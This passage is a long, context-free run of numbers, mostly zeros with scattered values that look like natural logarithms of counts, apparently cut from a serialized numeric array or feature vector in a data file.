0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.800574088041945, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 1.6094379124341003, 0.0, 3.649511027115099, 2.995732273553991,\n 3.367295829986474, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.58351893845611, 0.0, 0, 0.6931471805599453, 0.0, 0.0, \n 1.6094379124341003, 2.8903717578961645, 0, 0.0, 0, 0.0, \n 4.160336650881089, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.800574088041945, \n 3.8005740880419454, 0, 0.0, 0.0, 3.2188758248682006, 0.0, \n 3.044522437723423, 4.605170185988092, 1.7412592803704001, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.178053830347946, 0, 0, 0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, \n 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 5.1298987149230735, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0, 1.3862943611198906, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0, 0.0, \n 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 17.402456000857075, 4.8991863767100545, 3.0841946160253872, 0,\n 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 4.77912349311153, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.828641396489095, 0, \n 0.0, 0, 0.0, 0.0, 5.43372200355424, 0.0, 0, 0, 0, 5.390770307485499, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4965075614664802, 0.0, \n 2.1972245773362196, 0.0, 0.0, 4.06534854782536, 0.0, 0, 0, \n 2.1972245773362196, 0.0, 2.5649493574615367, 0, 4.969640753475787, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 7.177178314942233, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, \n 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0, \n 0.0, 3.258096538021482, 0, 0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, \n 3.4011973816621555, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.0841946160253877, \n 2.70805020110221, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.123963979403259, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.292158018817389, 0.0, 0.0, 0.0, \n 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.5263605246161616, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 2.8398715690385097, 0, 0.0, 0.0, 2.833213344056216, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 4.581130849408909, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 3.784189633918261, 0.0, 0.0, 0.0, 0, 0.0, 4.1588830833596715,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 3.649511027115099, \n 4.762173934797756, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 0.0, 9.620060922111964, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 4.248495242049359, 0, 0, 0, 2.1972245773362196, 0, \n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.6109179126442243, 7.69484807238461, 0.0, 3.2188758248682006, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.550898738446989, 3.0841946160253872, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 4.825453896395788, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 2.8398715690385097, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, \n 2.5649493574615367, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0910424533583156, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, \n 3.4825185607408002, 5.0301047650807, 0.0, 5.346437018291705, 0, 0, 0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0, 4.343805421853684, 0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 4.248495242049359, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 2.1972245773362196, \n 0.0, 4.143134726391533, 0, 0, 0.0, 5.679743138077019, 0.0, \n 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.4849066497880004, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.03709614637473, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 3.258096538021482, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.23410650459726, 0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 3.8066624897703196, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 4.418840607796598, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0, 0.0, \n 0.0, 0, 0.0, 0, 4.343805421853684, 4.605170185988092, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, \n 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.220355825078324,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.970291913552122, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.7612001156935624, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 1.0986122886681098, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, \n 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0841946160253877, 0.0, 0, 0.0, 0.0, 0.0, 4.110873864173311, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.518263445217987, \n 4.941642422609304, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 3.931825632724326, 8.921925063191328, \n 12.820490352323048, 0, 0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 3.5553480614894135, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 